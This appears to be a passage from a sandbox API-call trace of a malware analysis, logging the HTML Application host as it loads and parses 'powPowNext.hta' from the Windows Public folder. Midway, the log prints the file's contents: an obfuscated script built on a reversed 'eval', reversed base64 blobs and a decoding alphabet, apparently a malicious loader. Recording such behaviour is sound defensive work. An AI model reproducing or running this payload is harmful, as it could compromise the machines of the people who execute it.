(lpszFormat="application/xml") returned 0xc125 [0131.810] RegisterClipboardFormatW (lpszFormat="application/xhtml+xml") returned 0xc126 [0131.810] RegisterClipboardFormatW (lpszFormat="text/x-component") returned 0xc1c0 [0131.810] RegisterClipboardFormatW (lpszFormat="image/svg+xml") returned 0xc127 [0131.810] RegisterClipboardFormatW (lpszFormat="video/avi") returned 0xc118 [0131.810] RegisterClipboardFormatW (lpszFormat="video/x-msvideo") returned 0xc119 [0131.810] RegisterClipboardFormatW (lpszFormat="video/mpeg") returned 0xc11a [0131.810] RegisterClipboardFormatW (lpszFormat="video/quicktime") returned 0xc1c2 [0131.811] RegisterClipboardFormatW (lpszFormat="application/hta") returned 0xc1c3 [0131.811] RegisterClipboardFormatW (lpszFormat="text/cache-manifest") returned 0xc1c4 [0131.811] RegisterClipboardFormatW (lpszFormat="text/vtt") returned 0xc1c5 [0131.811] RegisterClipboardFormatW (lpszFormat="application/ttml+xml") returned 0xc1c6 [0131.811] RegisterClipboardFormatW (lpszFormat="application/ttaf+xml") returned 0xc1c7 [0131.811] RegisterClipboardFormatW (lpszFormat="text/json") returned 0xc1c8 [0131.811] RegisterClipboardFormatW (lpszFormat="application/x-javascript") returned 0xc1c9 [0131.811] RegisterClipboardFormatW (lpszFormat="image/x-png") returned 0xc10f [0131.811] RegisterClipboardFormatW (lpszFormat="image/png") returned 0xc110 [0131.811] RegisterClipboardFormatW (lpszFormat="image/jpeg") returned 0xc10d [0131.812] RegisterClipboardFormatW (lpszFormat="image/pjpeg") returned 0xc10c [0131.812] RegisterClipboardFormatW (lpszFormat="image/gif") returned 0xc10b [0131.812] RegisterClipboardFormatW (lpszFormat="image/vnd.ms-dds") returned 0xc1ca [0131.812] RegisterClipboardFormatW (lpszFormat="image/svg+xml") returned 0xc127 [0131.812] RegisterClipboardFormatW (lpszFormat="image/tiff") returned 0xc10e [0131.812] RegisterClipboardFormatW (lpszFormat="image/bmp") returned 0xc111 [0131.812] RegisterClipboardFormatW (lpszFormat="image/vnd.ms-photo") returned 0xc116 [0131.812] RegisterClipboardFormatW (lpszFormat="image/x-wmf") returned 0xc114 [0131.813] RegisterClipboardFormatW (lpszFormat="image/x-emf") returned 0xc113 [0131.813] RegisterClipboardFormatW (lpszFormat="image/x-icon") returned 0xc115 [0131.814] QueryPerformanceCounter (in: lpPerformanceCount=0x19eb88 | out: lpPerformanceCount=0x19eb88*=3095063354975) returned 1 [0131.815] QueryPerformanceCounter (in: lpPerformanceCount=0x19eb50 | out: lpPerformanceCount=0x19eb50*=3095063366733) returned 1 [0131.815] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x24) returned 0x5f2430 [0131.815] StrChrW (lpStart="application/hta", wMatch=0x3b) returned 0x0 [0131.815] StrCmpNICW (lpStr1="text/", lpStr2="appli", nChar=5) returned 19 [0131.815] StrCmpNICW (lpStr1="application/", lpStr2="application/", nChar=12) returned 0 [0131.815] IUnknown:Release (This=0x60bfcc) returned 0x6 [0131.815] IUnknown:AddRef (This=0x60bfcc) returned 0x7 [0131.815] IUnknown:AddRef (This=0x60bfcc) returned 0x8 [0131.815] IInternetProtocolSink:ReportData (This=0x60bfcc, grfBSCF=0x5, ulProgress=0xd12, ulProgressMax=0xd12) returned 0x0 [0131.816] IUnknown:QueryInterface (in: This=0x5f64f0, riid=0x6d6fe90c*(Data1=0x79eac9d8, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x19cf68 | out: ppvObject=0x19cf68*=0x0) returned 0x80004002 [0131.816] IUnknown:QueryInterface (in: This=0x5f64f0, riid=0x6d6fe934*(Data1=0x79eac9d6, Data2=0xbafa, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x19cf78 | out: ppvObject=0x19cf78*=0x0) returned 0x80004002 [0131.816] IUnknown:Release (This=0x60bfcc) returned 0x7 [0131.816] IUnknown:AddRef (This=0x60bfcc) returned 0x8 [0131.816] IInternetProtocolSink:ReportResult (This=0x60bfcc, hrResult=0x0, dwError=0x0, szResult=0x0) returned 0x0 [0131.816] IUnknown:Release (This=0x60bfcc) returned 0x7 [0131.816] IUnknown:Release (This=0x60bfcc) returned 0x6 [0131.817] IUnknown:Release (This=0x5f5f5c) returned 0x13 [0131.817] IUnknown:Release (This=0x5f0c00) returned 0x1 [0131.817] IUnknown:Release (This=0x5f5f5c) returned 0x12 [0131.817] IUnknown:Release (This=0x5f5f5c) returned 0x11 [0131.817] CoTaskMemFree (pv=0x0) [0131.817] GetCurrentThreadId () returned 0xb48 [0131.817] GetCurrentProcessId () returned 0xe14 [0131.817] GetCurrentThreadId () returned 0xb48 [0131.817] memcpy_s (in: _Destination=0x19f6f4, _DestinationSize=0xc, _Source=0xd40ce0, _SourceSize=0xc | out: _Destination=0x19f6f4) returned 0x0 [0131.818] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4e) returned 0x60c038 [0131.818] MulDiv (nNumber=3346, nNumerator=4000, nDenominator=3346) returned 4000 [0131.821] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.821] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.821] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.821] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x42) returned 0x60b838 [0131.821] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x24) returned 0x5f20d0 [0131.822] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x100) returned 0x60c090 [0131.823] IUnknown:QueryInterface (in: This=0x5f64f0, riid=0x6d822570*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x19f46c | out: ppvObject=0x19f46c*=0x5f64f0) returned 0x0 [0131.823] IInternetProtocol:Read (in: This=0x5f64f0, pv=0x60c09c, cb=0xc8, pcbRead=0x19f564 | out: pv=0x60c09c, pcbRead=0x19f564*=0xc8) returned 0x0 [0131.824] IUnknown:Release (This=0x5f64f0) returned 0x2 [0131.824] memcpy_s (in: _Destination=0x19f60c, _DestinationSize=0xc8, _Source=0x60c09c, _SourceSize=0xc8 | out: _Destination=0x19f60c) returned 0x0 [0131.824] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0131.824] GetProcAddress (hModule=0x703b0000, lpProcName="CoInternetIsFeatureEnabledForUrl") returned 0x70417870 [0131.825] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19f504 | out: lpflOldProtect=0x19f504*=0x4) returned 1 [0131.825] CoInternetIsFeatureEnabledForUrl (FeatureEntry=0x3, dwFlags=0x2, szURL="file:///C:/Users/Public/powPowNext.hta", pSecMgr=0x0) returned 0x1 [0131.825] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0131.826] GetProcAddress (hModule=0x703b0000, lpProcName="ReleaseBindInfo") returned 0x703de690 [0131.826] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19f510 | out: lpflOldProtect=0x19f510*=0x4) returned 1 [0131.826] ReleaseBindInfo (pbindinfo=0x19f5b8) [0131.830] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0131.835] GetProcAddress (hModule=0x703b0000, lpProcName="FindMimeFromData") returned 0x704268a0 [0131.835] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19f4c4 | out: lpflOldProtect=0x19f4c4*=0x4) returned 1 [0131.836] FindMimeFromData (in: pBC=0x0, pwzUrl="C:\\Users\\Public\\powPowNext.hta", pBuffer=0x19f60c, cbSize=0xc8, pwzMimeProposed="application/hta", dwMimeFlags=0x6, ppwzMimeOut=0x19f564, dwReserved=0x0 | out: ppwzMimeOut=0x19f564*="application/hta") returned 0x0 [0131.838] CoTaskMemFree (pv=0x610188) [0131.838] CoInternetIsFeatureEnabledForUrl (FeatureEntry=0x3, dwFlags=0x2, szURL="file:///C:/Users/Public/powPowNext.hta", pSecMgr=0x0) returned 0x1 [0131.838] StrCmpNIW (lpStr1="applic", lpStr2="image/", nChar=6) returned -1 [0131.838] GetCurrentThreadId () returned 0xb48 [0131.838] GetCurrentThreadId () returned 0xb48 [0131.839] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f48c | out: lpCPInfo=0x19f48c) returned 1 [0131.839] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="application/hta", cchCount1=7, lpString2="charset", cchCount2=7) returned 1 [0131.839] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1006) returned 0x5f69e0 [0131.839] memcpy_s (in: _Destination=0x5f69e0, _DestinationSize=0x1000, _Source=0x60c09c, _SourceSize=0xc8 | out: _Destination=0x5f69e0) returned 0x0 [0131.839] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x60c090, Size=0x4000) returned 0x610c10 [0131.840] IUnknown:QueryInterface (in: This=0x5f64f0, riid=0x6d822570*(Data1=0x79eac9e4, Data2=0xbaf9, Data3=0x11ce, Data4=([0]=0x8c, [1]=0x82, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0xa9, [7]=0xb)), ppvObject=0x19f33c | out: ppvObject=0x19f33c*=0x5f64f0) returned 0x0 [0131.840] IInternetProtocol:Read (in: This=0x5f64f0, pv=0x610ce4, cb=0xf38, pcbRead=0x19f430 | out: pv=0x610ce4, pcbRead=0x19f430*=0xc4a) returned 0x1 [0131.841] IUnknown:Release (This=0x5f64f0) returned 0x2 [0131.841] memcpy_s (in: _Destination=0x5f6aa8, _DestinationSize=0xf38, _Source=0x610ce4, _SourceSize=0xc4a | out: _Destination=0x5f6aa8) returned 0x0 [0131.841] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2000) returned 0x614c18 [0131.841] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x5f69e0, cbMultiByte=3346, lpWideCharStr=0x614c18, cchWideChar=3346 | out: lpWideCharStr="
lave
2FmcgcWayxGTptWZE92byBSPg4WZ3BSQjRXa2VGWPJmalNGdoISbzhXbsJjL41GboRHdwJSK7cWayxGTptWZE92by5ybwVmboIyRFRlIsAiIoRHdwpzLvMHavVHbkVmclxGbp9Gd0RmLj9WbvI2bvx2avEFbhp0a4MkN2lVcJlXR3JGZ5BnQIZ3M5pkUvcncXdlTDR0L3cDNyczLiVmY5NHO/MWak1jQtlzYBBlJ3BFO6h2aL1TYOx0QzImSDhmWNVzRhVXSCZSPTBTTSN1NyoWc0t2TSh3SBNTaVtmakNlIsAiZhx2cllyOnlmcsxUarVGRv9mcuMXZuRGKpsTamhyZpJHbMl2alR0bvJnLzRXY0V3cg0TPgIDMwkye0JXe7ZXYyByahJ3bsl1b1dUayxGI9AibldHIBNGdpZXZY9kYqV2Y0hiIhR2bkJmLzRnclFWbikyOrFmcvxWWvV3RpJHbu8Gcl52OrFmcvxWWvV3RpJHbuQXewVGI9ASM7sWYy9GbZ9WdHlmcs5ydylGdlhyZpJHbMl2alR0bvJnLyV2cw9mbzVmYvRWepszahJ3bsl1b1dUayxmLzFmdlR3bmlGblhiIjpDXcV3clJ3ccxFc1JGbpNGXcRXdiV2RpJHbM9WYk5iawdmIsAiMpszahJ3bsl1b1dUayxmLjx2bzV2O9NWY0NGaoUWK71Xf|||==gdhJHInlmcsxUarVGTvZXZg0DIuV2dgE0Y0lmdlh1TipWZjRHKic3cjJXawRnLzhWZsxmIpsjdhJHI59WdQ92dUVnYlBSPg4WZ3BSQjRXa2VGWPJmalNGdoIycjJXawRXaudmLmlGblNXezRXZt9mYqV2Y0JSK7cWayxGTptWZM9mdl5ic15GKiIXZnNndyNjMgMmOcxVdzVmczxFXwVnYsl2YcxFd1JWZHlmcsx0bhRmLqB3ZikyO
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=
\r\n") returned 3346 [0131.842] GetCurrentThreadId () returned 0xb48 [0131.842] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x614c18 | out: hHeap=0x5e0000) returned 1 [0131.842] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x5f69e0 | out: hHeap=0x5e0000) returned 1 [0131.842] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.842] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.842] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.843] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.843] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.843] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.843] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.843] GetCurrentThreadId () returned 0xb48 [0131.843] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.844] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0131.844] GetProcAddress (hModule=0x703b0000, lpProcName=0x1be) returned 0x7041c820 [0131.844] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19f42c | out: lpflOldProtect=0x19f42c*=0x4) returned 1 [0131.845] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.845] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f3e4 | out: lpCPInfo=0x19f3e4) returned 1 [0131.845] IUnknown:AddRef (This=0x5fc930) returned 0x4 [0131.845] IUnknown:AddRef (This=0x5f5f5c) returned 0x12 [0131.845] IUnknown:QueryInterface (in: This=0x5f5f5c, riid=0x6d73333c*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x19f3b8 | out: ppvObject=0x19f3b8*=0x5f5f5c) returned 0x0 [0131.846] IUnknown:Release (This=0x5f5f5c) returned 0x12 [0131.846] IUnknown:AddRef (This=0x5f5f5c) returned 0x13 [0131.846] IUri:GetScheme (in: This=0x5f5f5c, pdwScheme=0x19f3fc | out: pdwScheme=0x19f3fc*=0x9) returned 0x0 [0131.846] IUri:GetScheme (in: This=0x5f5f5c, pdwScheme=0x19f3dc | out: pdwScheme=0x19f3dc*=0x9) returned 0x0 [0131.846] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="application/hta", cchCount1=7, lpString2="charset", cchCount2=7) returned 1 [0131.846] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.846] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x29c [0131.846] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2a4 [0131.846] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x6dd5cca0, lpParameter=0xcfc3c0, dwCreationFlags=0x0, lpThreadId=0xcfc3d4 | out: lpThreadId=0xcfc3d4*=0x3ec) returned 0x2ec [0131.848] GetCurrentThreadId () returned 0xb48 [0131.848] SetEvent (hEvent=0x29c) returned 1 [0131.848] GetCurrentThreadId () returned 0xb48 [0131.848] IUnknown:Release (This=0x5f5f5c) returned 0x12 [0131.848] IUnknown:Release (This=0x60a0f4) returned 0x2 [0131.848] IUnknown:Release (This=0x5f2fa0) returned 0x3 [0131.848] IUnknown:Release (This=0x5f5f5c) returned 0x11 [0131.848] IUnknown:Release (This=0x5f5f5c) returned 0x10 [0131.848] IUnknown:Release (This=0x5f5f5c) returned 0xf [0131.848] IUnknown:Release (This=0x5f2fa0) returned 0x2 [0131.848] IUnknown:Release (This=0x5f5f5c) returned 0xe [0131.849] CoTaskMemFree (pv=0x609d58) [0131.849] CoTaskMemFree (pv=0x0) [0131.849] IUnknown:Release (This=0x5f5f5c) returned 0xd [0131.849] CoTaskMemFree (pv=0x604800) [0131.849] GetClientRect (in: hWnd=0x70258, lpRect=0x19fe24 | out: lpRect=0x19fe24) returned 1 [0131.849] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.849] GetClientRect (in: hWnd=0x70258, lpRect=0xd0c12c | out: lpRect=0xd0c12c) returned 1 [0131.849] OffsetRect (in: lprc=0xd0c12c, dx=0, dy=0 | out: lprc=0xd0c12c) returned 1 [0131.849] OffsetRect (in: lprc=0xd0c13c, dx=0, dy=0 | out: lprc=0xd0c13c) returned 1 [0131.849] RegisterClassExW (param_1=0x19faf0) returned 0xc0f2 [0131.850] CoCreateInstance (in: rclsid=0x6d723048*(Data1=0x50d5107a, Data2=0xd278, Data3=0x4871, Data4=([0]=0x89, [1]=0x89, [2]=0xf4, [3]=0xce, [4]=0xaa, [5]=0xf5, [6]=0x9c, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x401, riid=0x6d723038*(Data1=0x8c0e040, Data2=0x62d1, Data3=0x11d1, Data4=([0]=0x93, [1]=0x26, [2]=0x0, [3]=0x60, [4]=0xb0, [5]=0x67, [6]=0xb8, [7]=0x6e)), ppv=0x6e893c74 | out: ppv=0x6e893c74*=0x610430) returned 0x0 [0131.921] CActiveIMMAppEx_Trident:IActiveIMMApp:FilterClientWindows (This=0x610430, aaClassList=0x19fbc4*=0xc0f2, uSize=0x1) returned 0x0 [0131.921] CreateWindowExW (dwExStyle=0x0, lpClassName=0xc0f2, lpWindowName=0x0, dwStyle=0x46000000, X=0, Y=0, nWidth=1064, nHeight=585, hWndParent=0x70258, hMenu=0x0, hInstance=0x6d6d0000, lpParam=0xd10000) returned 0x103ba [0131.922] SetWindowLongW (hWnd=0x103ba, nIndex=-21, dwNewLong=13697024) returned 0 [0131.922] GetWindowLongW (hWnd=0x103ba, nIndex=-20) returned 0 [0131.922] GetAncestor (hwnd=0x103ba, gaFlags=0x2) returned 0x70258 [0131.922] GetWindowLongW (hWnd=0x70258, nIndex=-20) returned 262400 [0131.922] GetWindowLongW (hWnd=0x103ba, nIndex=-20) returned 0 [0131.922] GetParent (hWnd=0x103ba) returned 0x70258 [0131.922] GetWindowLongW (hWnd=0x70258, nIndex=-20) returned 262400 [0131.922] GetParent (hWnd=0x70258) returned 0x4031a [0131.922] GetWindowLongW (hWnd=0x4031a, nIndex=-20) returned 256 [0131.923] GetParent (hWnd=0x4031a) returned 0x0 [0131.923] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103ba, msg=0x81, wParam=0x0, lParam=0x19f750*=13697024, plResult=0x19f58c | out: plResult=0x19f58c) returned 0x1 [0131.923] NtdllDefWindowProc_W () returned 0x1 [0131.923] GetCurrentThreadId () returned 0xb48 [0131.923] GetWindowLongW (hWnd=0x103ba, nIndex=-21) returned 13697024 [0131.924] GetCurrentThreadId () returned 0xb48 [0131.924] GetWindowLongW (hWnd=0x103ba, nIndex=-21) returned 13697024 [0131.924] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103ba, msg=0x1, wParam=0x0, lParam=0x19f750*=13697024, plResult=0x19f58c | out: plResult=0x19f58c) returned 0x1 [0131.924] NtdllDefWindowProc_W () returned 0x0 [0131.924] GetCurrentThreadId () returned 0xb48 [0131.925] GetWindowLongW (hWnd=0x103ba, nIndex=-21) returned 13697024 [0131.925] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103ba, msg=0x5, wParam=0x0, lParam=0x2490428, plResult=0x19f5d8 | out: plResult=0x19f5d8) returned 0x1 [0131.925] NtdllDefWindowProc_W () returned 0x0 [0131.925] GetCurrentThreadId () returned 0xb48 [0131.925] GetWindowLongW (hWnd=0x103ba, nIndex=-21) returned 13697024 [0131.925] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103ba, msg=0x3, wParam=0x0, lParam=0x0, plResult=0x19f5d8 | out: plResult=0x19f5d8) returned 0x1 [0131.925] NtdllDefWindowProc_W () returned 0x0 [0131.925] GetCurrentThreadId () returned 0xb48 [0131.925] NtdllDefWindowProc_W () returned 0x0 [0131.926] GetWindowRect (in: hWnd=0x103ba, lpRect=0x19f9a8 | out: lpRect=0x19f9a8) returned 1 [0131.926] GetParent (hWnd=0x103ba) returned 0x70258 [0131.926] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0x70258, lpPoints=0x19f9a8, cPoints=0x2 | out: lpPoints=0x19f9a8) returned -3670050 [0131.926] GetClassNameW (in: hWnd=0x70258, lpClassName=0x19f9b8, nMaxCount=256 | out: lpClassName="HTML Application Host Window Class") returned 34 [0131.927] GetWindowThreadProcessId (in: hWnd=0x30316, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0131.927] GetCurrentThreadId () returned 0xb48 [0131.927] CActiveIMMAppEx_Trident:IActiveIMMApp:Activate (This=0x610430, fRestoreLayout=1) returned 0x0 [0131.927] SendMessageW (hWnd=0x103ba, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x0 [0131.927] GetWindowLongW (hWnd=0x103ba, nIndex=-21) returned 13697024 [0131.927] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x610430, hWnd=0x103ba, msg=0x129, wParam=0x0, lParam=0x0, plResult=0x19fa74 | out: plResult=0x19fa74) returned 0x1 [0131.927] NtdllDefWindowProc_W () returned 0x0 [0131.927] GetCurrentThreadId () returned 0xb48 [0131.928] LoadLibraryExW (lpLibFileName="ext-ms-win-ntuser-touch-hittest-l1-1-0.dll", hFile=0x0, dwFlags=0x0) returned 0x76300000 [0131.928] GetProcAddress (hModule=0x76300000, lpProcName="RegisterTouchHitTestingWindow") returned 0x7633c9a0 [0131.928] RegisterTouchHitTestingWindow (hwnd=0x103ba, value=0x1) returned 1 [0131.931] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.931] QISearch (in: that=0xd0e480, pqit=0x6d6fca98, riid=0x6d6fcaa8*(Data1=0xa5200748, Data2=0x18ae, Data3=0x4da5, Data4=([0]=0x93, [1]=0xaf, [2]=0x0, [3]=0x19, [4]=0x47, [5]=0x70, [6]=0x3, [7]=0xa1)), ppv=0xd10e00 | out: that=0xd0e480, ppv=0xd10e00*=0xd0e480) returned 0x0 [0131.932] IntersectRect (in: lprcDst=0x19fc24, lprcSrc1=0xd0c12c, lprcSrc2=0xd0c13c | out: lprcDst=0x19fc24) returned 1 [0131.932] EqualRect (lprc1=0x19fc24, lprc2=0xd0c12c) returned 1 [0131.932] InvalidateRect (hWnd=0x103ba, lpRect=0x0, bErase=1) returned 1 [0131.933] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x9990) returned 0x620bc8 [0131.934] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x110) returned 0x6123f8 [0131.934] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xb0) returned 0x611c20 [0131.935] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0131.935] GetProcessHeap () returned 0x5e0000 [0131.935] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x30) returned 0x6015f0 [0131.935] GetCurrentProcessId () returned 0xe14 [0131.935] ProcessIdToSessionId (in: dwProcessId=0xe14, pSessionId=0x19faec | out: pSessionId=0x19faec) returned 1 [0131.935] WTSGetActiveConsoleSessionId () returned 0x1 [0131.935] EnumDisplaySettingsW (in: lpszDeviceName=0x0, iModeNum=0xffffffff, lpDevMode=0x19fb18 | out: lpDevMode=0x19fb18) returned 1 [0131.936] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.937] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.937] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.938] GetWindowThreadProcessId (in: hWnd=0x30316, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0131.938] GetCurrentThreadId () returned 0xb48 [0131.938] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x90) returned 0x612510 [0131.938] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x34) returned 0x612c58 [0131.939] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.939] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x24) returned 0x5f2460 [0131.939] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.939] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.939] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.939] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x6c) returned 0x604800 [0131.940] memcpy_s (in: _Destination=0x19efe0, _DestinationSize=0xc28, _Source=0x6e8993e0, _SourceSize=0xc28 | out: _Destination=0x19efe0) returned 0x0 [0131.941] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.941] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.941] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.942] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x4, lpflOldProtect=0x6e793704 | out: lpflOldProtect=0x6e793704*=0x2) returned 1 [0131.942] GetProcAddress (hModule=0x743f0000, lpProcName=0x8) returned 0x74402590 [0131.943] VirtualProtect (in: lpAddress=0x6e8a7000, dwSize=0xb44, flNewProtect=0x2, lpflOldProtect=0x19ee14 | out: lpflOldProtect=0x19ee14*=0x4) returned 1 [0131.944] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.945] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.945] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.946] QueryPerformanceCounter (in: lpPerformanceCount=0xd109e0 | out: lpPerformanceCount=0xd109e0*=3095076459467) returned 1 [0131.946] GetCurrentThreadId () returned 0xb48 [0131.946] GetCurrentThreadId () returned 0xb48 [0131.946] GetCurrentThreadId () returned 0xb48 [0131.948] QueryPerformanceCounter (in: lpPerformanceCount=0x19fb98 | out: lpPerformanceCount=0x19fb98*=3095076667157) returned 1 [0131.948] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.948] QueryPerformanceCounter (in: lpPerformanceCount=0x19fb1c | out: lpPerformanceCount=0x19fb1c*=3095076712949) returned 1 [0131.948] QueryPerformanceCounter (in: lpPerformanceCount=0x19fb08 | out: lpPerformanceCount=0x19fb08*=3095076722039) returned 1 [0131.948] QueryPerformanceCounter (in: lpPerformanceCount=0x19faac | out: lpPerformanceCount=0x19faac*=3095076734317) returned 1 [0131.949] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.949] SetCoalescableTimer (hWnd=0x30316, nIDEvent=0x2002, uElapse=0x1f4, lpTimerFunc=0x0, uToleranceDelay=0x0) returned 0x2002 [0131.949] GetWindowThreadProcessId (in: hWnd=0x30316, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb48 [0131.949] GetCurrentThreadId () returned 0xb48 [0131.949] QueryPerformanceCounter (in: lpPerformanceCount=0x19faa4 | out: lpPerformanceCount=0x19faa4*=3095076809680) returned 1 [0131.949] QueryPerformanceCounter (in: lpPerformanceCount=0x19f9c4 | out: lpPerformanceCount=0x19f9c4*=3095076829367) returned 1 [0131.954] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.954] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.954] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.954] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0131.954] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x304 [0131.954] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x6dd5cca0, lpParameter=0xd4c000, dwCreationFlags=0x0, lpThreadId=0xd4c014 | out: lpThreadId=0xd4c014*=0x464) returned 0x300 [0131.955] SetEvent (hEvent=0x304) returned 1 [0131.955] WTSGetActiveConsoleSessionId () returned 0x1 [0131.956] QueryPerformanceFrequency (in: lpFrequency=0x19f918 | out: lpFrequency=0x19f918*=100000000) returned 1 [0131.956] QueryPerformanceCounter 